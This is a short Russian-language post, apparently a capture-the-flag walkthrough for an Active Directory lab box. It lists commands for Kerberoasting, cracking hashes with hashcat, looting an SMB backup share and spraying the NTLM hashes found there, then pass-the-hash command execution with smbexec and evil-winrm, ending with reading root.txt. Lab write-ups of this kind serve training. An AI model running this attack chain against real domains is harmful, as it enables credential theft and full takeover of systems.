###Access to SMB Part 2###

##Попробовал получить в домене учётные записи пользователей, у которых зарегистрированы Service Principal Names (SPN)## docker run -it impacket GetUserSPNs.py -dc-ip 10.114.153.46 SOUPEDECODE.LOCAL/ybob317:ybob317 ##Пробую получить хеши паролей сервисных учётных записей в домене Active Directory, для которых зарегистрированы имена субъектов-служб (SPN).## GetUserSPNs.py -dc-ip 10.114.153.46 SOUPEDECODE.LOCAL/ybob317:ybob317 -request > hash.txt docker cp 2db07711c430:hash.txt /home/kali ##Восстановление пароля из хеша## hashcat -a0 -m13100 hash.txt /usr/share/wordlists/rockyou.txt --show smbclient -L \\10.114.153.46 -U “file_svc” Password123!! #Нашёл доступ к резервной копии# smbclient \\\\10.114.153.46\\backup -U “file_svc” get backup_extract.txt #Соберу листы имена пользователей и хеш# awk -F\: ‘{print $1}’ backup_extract.txt > usernames_spn.txt awk -F\: ‘{print $4}’ backup_extract.txt > spn_hashes.txt #Проверю учётные данные на целевом хосте по протоколу SMB# nxc smb 10.114.153.46 -u usernames_spn.txt -H spn_hashes.txt --no-brute #Удалённое выполнение команд на компьютере с Windows с использованием NTLM-хеша аутентификации# smbexec.py ‘FileServer$’@10.114.153.46 -hashes ‘:e41da7e79a4c76dbd9cf79d1cb325559’ whoami /all dir c:\Users dir C:\Users\Administrator\Desktop type C:\Users\Administrator\Desktop\root.txt #Установление удалённого сеанса PowerShell (нашёл в интернете)# evil-winrm -u FileServer$ -H ‘e41da7e79a4c76dbd9cf79d1cb325559’ -i 10.114.153.46

##END##

###Access to SMB Part 2### | Сетка — социальная сеть от hh.ru ###Access to SMB Part 2### | Сетка — социальная сеть от hh.ru